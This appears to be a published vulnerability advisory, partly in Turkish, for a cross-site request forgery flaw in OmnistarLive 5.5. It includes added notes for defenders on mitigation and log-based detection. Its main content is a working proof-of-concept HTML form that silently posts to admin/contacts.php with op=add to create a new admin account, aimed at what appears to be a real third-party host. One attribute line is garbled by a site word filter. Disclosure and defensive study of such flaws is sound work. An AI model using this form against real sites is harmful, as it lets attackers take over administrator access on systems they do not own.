< ------------------- header data start ------------------- >

#############################################################

# Application Name : OmnistarLive

# Version : 5.5

# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)

# Impact : Yeni bir admin kullanicisi eklenebilir. (English: a new admin user can be added.)

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. (English: a session token should be added to the form, and the old password should be requested.)

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<!--
  Proof-of-concept form, reproduced as published.

  What the markup shows: a POST to admin/contacts.php carrying op=add together
  with login, password, password-confirmation, subscribe and e-mail fields.
  None of the fields is a per-session anti-CSRF token; the hidden inputs are
  only op, id, uid and check. The advisory header states that the result is a
  new admin user.

  Defender notes:
  * Mitigation, per the advisory: bind the form to an unpredictable session
    token that the server verifies, and ask for the existing password before
    the change is accepted. SameSite session cookies and an Origin/Referer
    check on state-changing admin requests are complementary controls.
  * Detection: look in web-server logs for POSTs to admin/contacts.php with
    op=add whose Origin or Referer is not the application's own host, and
    audit the admin contact list for accounts nobody created on purpose.
-->
<form action=http://www.tbsitax.com/support81/admin/contacts.php method=post>

<!-- Account fields; the value attributes are empty in the published listing. -->
<input type=text name=’f_login’ value= size=40></td></tr>

<input type=password name=’f_password’ value= ></td></tr>

<input type=password name=’f_password2’ value= ></td></tr>

<input type=checkbox name=’f_subscribe’ value=’1’ checked ></td></tr>

<input type=text name=’contact_Email_’ value= size=40></td></tr>

<!-- op=add is the operation selector sent to contacts.php; id and uid are sent empty. -->
<input type=hidden name=op value=add>

<input type=hidden name=id value=>

<input type=hidden name=uid value=>

<!-- NOTE(review): the attribute text on the next line looks garbled, presumably by
     the hosting site's word filter ("Yasak Kelime" is Turkish for "forbidden word");
     it is left exactly as published. -->
<input type=image name=check Yasak Kelime#146;../admin/images/button_update.jpg’ border=0>

<input type=hidden name=check value=’update’></td></tr>

</form>
< -- bug code end of -- >